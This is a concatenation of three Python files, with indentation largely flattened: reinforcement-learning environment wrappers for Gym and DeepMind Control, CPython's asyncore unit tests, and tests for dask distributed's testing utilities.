obs[self._key] = self._render_image()
return obs
def _render_image(self):
image = self._env.render('rgb_array')
if image.shape[:2] != self._size:
kwargs = dict(mode='edge', order=1, preserve_range=True)
image = skimage.transform.resize(image, self._size, **kwargs)
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
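def _pixel_dtype_demo():
  # Hedged illustration, not part of the original module: _render_image() above
  # rescales float images in [0, 1] to uint8 in [0, 255] and back again.
  float_image = np.full((2, 2, 3), 0.5, dtype=np.float32)
  assert ((float_image * 255).astype(np.uint8) == 127).all()
  uint8_image = np.full((2, 2, 3), 255, dtype=np.uint8)
  assert (uint8_image.astype(np.float32) / 255 == 1.0).all()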
class OverwriteRender(object):
def __init__(self, env, render_fn):
self._env = env
self._render_fn = render_fn
self._env.render('rgb_array') # Set up viewer.
def __getattr__(self, name):
return getattr(self._env, name)
def render(self, *args, **kwargs):
return self._render_fn(self._env, *args, **kwargs)
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
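def _action_repeat_demo():
  # Hedged illustration, not part of the original module: ActionRepeat sums the
  # reward over `amount` inner steps and stops early once the episode ends.
  # _CountingEnv is a stand-in defined only for this sketch.
  class _CountingEnv(object):
    def __init__(self):
      self.steps = 0
    def step(self, action):
      self.steps += 1
      return self.steps, 1.0, self.steps >= 5, {}
  env = ActionRepeat(_CountingEnv(), amount=3)
  _, reward, done, _ = env.step(action=None)
  assert reward == 3.0 and not done  # three inner steps, rewards summed
  _, reward, done, _ = env.step(action=None)
  assert reward == 2.0 and done      # stops early when the episode ends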
class DeepMindWrapper(object):
"""Wraps a DM Control environment into a Gym interface."""
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, env, render_size=(64, 64), camera_id=0):
self._env = env
self._render_size = render_size
self._camera_id = camera_id
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
else:
assert not done
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ProcessObservation(object):
def __init__(self, env, process_fn):
self._env = env
self._process_fn = process_fn
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return nested.map(
lambda box: gym.spaces.Box(
self._process_fn(box.low),
self._process_fn(box.high),
dtype=self._process_fn(box.low).dtype),
self._env.observation_space)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
class PadActions(object):
"""Pad action space to the largest action space."""
def __init__(self, env, spaces):
self._env = env
self._action_space = self._pad_box_space(spaces)
@property
def observation_space(self):
return self._env.observation_space
@property
def action_space(self):
return self._action_space
def step(self, action, *args, **kwargs):
action = action[:len(self._env.action_space.low)]
return self._env.step(action, *args, **kwargs)
def reset(self, *args, **kwargs):
return self._env.reset(*args, **kwargs)
def _pad_box_space(self, spaces):
assert all(len(space.low.shape) == 1 for space in spaces)
length = max(len(space.low) for space in spaces)
low, high = np.inf * np.ones(length), -np.inf * np.ones(length)
for space in spaces:
low[:len(space.low)] = np.minimum(space.low, low[:len(space.low)])
high[:len(space.high)] = np.maximum(space.high, high[:len(space.high)])
return gym.spaces.Box(low, high, dtype=np.float32)
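def _pad_actions_demo():
  # Hedged illustration, not part of the original module: the padded space
  # takes the element-wise minimum of the lows and maximum of the highs,
  # stretched to the longest action vector, and step() truncates the padded
  # action back to the wrapped environment's size.  _OneDimEnv is a stand-in
  # defined only for this sketch.
  class _OneDimEnv(object):
    action_space = gym.spaces.Box(-np.ones(1), np.ones(1), dtype=np.float32)
    def step(self, action):
      assert len(action) == 1
      return np.zeros(1), 0.0, False, {}
  spaces = [
      _OneDimEnv.action_space,
      gym.spaces.Box(-2 * np.ones(3), 2 * np.ones(3), dtype=np.float32)]
  env = PadActions(_OneDimEnv(), spaces)
  assert env.action_space.shape == (3,)  # padded to the longest space
  env.step(np.zeros(3))                  # extra dimensions are dropped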
class CollectGymDataset(object):
"""Collect transition tuples and store episodes as Numpy files."""
def __init__(self, env, outdir):
self._env = env
self._outdir = outdir and os.path.expanduser(outdir)
self._episode = None
self._transition = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
if kwargs.get('blocking', True):
transition = self._env.step(action, *args, **kwargs)
return self._process_step(action, *transition)
else:
future = self._env.step(action, *args, **kwargs)
return lambda: self._process_step(action, *future())
def reset(self, *args, **kwargs):
if kwargs.get('blocking', True):
observ = self._env.reset(*args, **kwargs)
return self._process_reset(observ)
else:
future = self._env.reset(*args, **kwargs)
return lambda: self._process_reset(future())
def _process_step(self, action, observ, reward, done, info):
self._transition.update({'action': action, 'reward': reward})
self._transition.update(info)
self._episode.append(self._transition)
self._transition = {}
if not done:
self._transition.update(self._process_observ(observ))
else:
episode = self._get_episode()
info['episode'] = episode
if self._outdir:
filename = self._get_filename()
self._write(episode, filename)
return observ, reward, done, info
def _process_reset(self, observ):
self._episode = []
self._transition = {}
self._transition.update(self._process_observ(observ))
return observ
def _process_observ(self, observ):
if not isinstance(observ, dict):
observ = {'observ': observ}
return observ
def _get_filename(self):
timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
identifier = str(uuid.uuid4()).replace('-', '')
filename = '{}-{}.npz'.format(timestamp, identifier)
filename = os.path.join(self._outdir, filename)
return filename
def _get_episode(self):
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: np.array(v) for k, v in episode.items()}
for key, sequence in episode.items():
if sequence.dtype == 'object':
message = "Sequence '{}' is not numeric:\n{}"
raise RuntimeError(message.format(key, sequence))
return episode
def _write(self, episode, filename):
if not tf.gfile.Exists(self._outdir):
tf.gfile.MakeDirs(self._outdir)
with io.BytesIO() as file_:
np.savez_compressed(file_, **episode)
file_.seek(0)
with tf.gfile.Open(filename, 'w') as ff:
ff.write(file_.read())
name = os.path.splitext(os.path.basename(filename))[0]
tf.logging.info('Recorded episode {}.'.format(name))
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
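def _external_process_demo():
  # Hedged usage sketch, not part of the original module: the constructor runs
  # inside the child process, and step()/reset() either block or hand back a
  # promise that is resolved later.  'Pendulum-v0' is only an illustrative
  # environment id.
  env = ExternalProcess(lambda: gym.make('Pendulum-v0'))
  observ = env.reset()                    # blocking round trip over the pipe
  promise = env.step(env.action_space.sample(), blocking=False)
  observ, reward, done, info = promise()  # resolve the promise when needed
  env.close()                             # joins the worker process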
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
HOST = test_support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEquals(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEquals(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEquals(lines, expected)
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
cap = StringIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
if hasattr(asyncore, 'file_wrapper'):
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = "It's not dead, it's sleeping!"
file(TESTFN, 'w').write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), "It's not dead")
self.assertEqual(w.read(6), ", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = "Come again?"
d2 = "I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll]
if hasattr(asyncore, 'file_wrapper'):
tests.append(FileWrapperTest)
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
test_utils_test.py
|
import asyncio
import os
import pathlib
import signal
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
import yaml
from tornado import gen
import dask.config
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.compatibility import WINDOWS
from distributed.core import Server, rpc
from distributed.metrics import time
from distributed.utils import mp_context
from distributed.utils_test import (
_LockedCommPool,
_UnhashableCallable,
assert_worker_story,
check_process_leak,
cluster,
dump_cluster_state,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.parametrize("foo", [True])
@gen_test()
async def test_gen_test_parametrized(foo):
assert foo is True
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", [False])
@gen_test()
async def test_gen_test_double_parametrized(foo, bar):
assert foo is True
assert bar is False
@gen_test()
async def test_gen_test_pytest_fixture(tmp_path):
assert isinstance(tmp_path, pathlib.Path)
@contextmanager
def _listen(delay=0):
serv = socket.socket()
serv.bind(("127.0.0.1", 0))
e = threading.Event()
def do_listen():
e.set()
sleep(delay)
serv.listen(5)
ret = serv.accept()
if ret is not None:
cli, _ = ret
cli.close()
serv.close()
t = threading.Thread(target=do_listen)
t.daemon = True
t.start()
try:
e.wait()
sleep(0.01)
yield serv
finally:
t.join(5.0)
def test_new_config():
c = config.copy()
with new_config({"xyzzy": 5}):
config["xyzzy"] == 5
assert config == c
assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
    assert tls_client.submit(lambda x: x + 1, 10).result() == 11
assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(
security=security, host="localhost", dashboard_address=":0"
) as s:
assert s.address.startswith("tls")
def test__UnhashableCallable():
func = _UnhashableCallable()
assert func(1) == 2
with pytest.raises(TypeError, match="unhashable"):
hash(func)
class MyServer(Server):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.handlers["ping"] = self.pong
self.counter = 0
def pong(self, comm):
self.counter += 1
return "pong"
@pytest.mark.asyncio
async def test_locked_comm_drop_in_replacement(loop):
    async with MyServer({}) as a, MyServer({}) as b:
await a.listen(0)
read_event = asyncio.Event()
read_event.set()
read_queue = asyncio.Queue()
original_pool = a.rpc
a.rpc = _LockedCommPool(
original_pool, read_event=read_event, read_queue=read_queue
)
await b.listen(0)
# Event is set, the pool works like an ordinary pool
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
assert res == "pong"
assert b.counter == 1
read_event.clear()
# Can also be used without a lock to intercept network traffic
a.rpc = _LockedCommPool(original_pool, read_queue=read_queue)
a.rpc.remove(b.address)
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
@pytest.mark.asyncio
async def test_locked_comm_intercept_read(loop):
async with MyServer({}) as a, MyServer({}) as b:
await a.listen(0)
await b.listen(0)
read_event = asyncio.Event()
read_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, read_event=read_event, read_queue=read_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
        # We didn't block the write but merely the read. The remote should have
# received the message and responded already
while not b.counter:
await asyncio.sleep(0.001)
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
assert await read_queue.get() == (b.address, "pong")
read_event.set()
assert await fut == "pong"
@pytest.mark.asyncio
async def test_locked_comm_intercept_write(loop):
async with MyServer({}) as a, MyServer({}) as b:
await a.listen(0)
await b.listen(0)
write_event = asyncio.Event()
write_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, write_event=write_event, write_queue=write_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
# Write was blocked. The remote hasn't received the message, yet
assert b.counter == 0
assert await write_queue.get() == (b.address, {"op": "ping", "reply": True})
write_event.set()
assert await fut == "pong"
@pytest.mark.slow()
def test_dump_cluster_state_timeout(tmp_path):
sleep_time = 30
async def inner_test(c, s, a, b):
await asyncio.sleep(sleep_time)
# This timeout includes cluster startup and teardown which sometimes can
# take a significant amount of time. For this particular test we would like
# to keep the _test timeout_ small because we intend to trigger it but the
# overall timeout large.
test = gen_cluster(client=True, timeout=5, cluster_dump_directory=tmp_path)(
inner_test
)
try:
with pytest.raises(asyncio.TimeoutError) as exc:
test()
assert "inner_test" in str(exc)
assert "await asyncio.sleep(sleep_time)" in str(exc)
except gen.TimeoutError:
pytest.xfail("Cluster startup or teardown took too long")
_, dirs, files = next(os.walk(tmp_path))
assert not dirs
assert files == [inner_test.__name__ + ".yaml"]
import yaml
with open(tmp_path / files[0], "rb") as fd:
state = yaml.load(fd, Loader=yaml.Loader)
assert "scheduler" in state
assert "workers" in state
def test_assert_worker_story():
now = time()
story = [
("foo", "id1", now - 600),
("bar", "id2", now),
("baz", {1: 2}, "id2", now),
]
# strict=False
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})])
assert_worker_story(story, [])
assert_worker_story(story, [("foo",)])
assert_worker_story(story, [("foo",), ("bar",)])
assert_worker_story(story, [("baz", lambda d: d[1] == 2)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo", "nomatch")])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", {1: 3})])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",), ("baz", "extra"), ("+1",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", lambda d: d[1] == 3)])
with pytest.raises(KeyError): # Faulty lambda
assert_worker_story(story, [("baz", lambda d: d[2] == 1)])
assert_worker_story([], [])
assert_worker_story([("foo", "id1", now)], [("foo",)])
with pytest.raises(AssertionError):
assert_worker_story([], [("foo",)])
# strict=True
assert_worker_story([], [], strict=True)
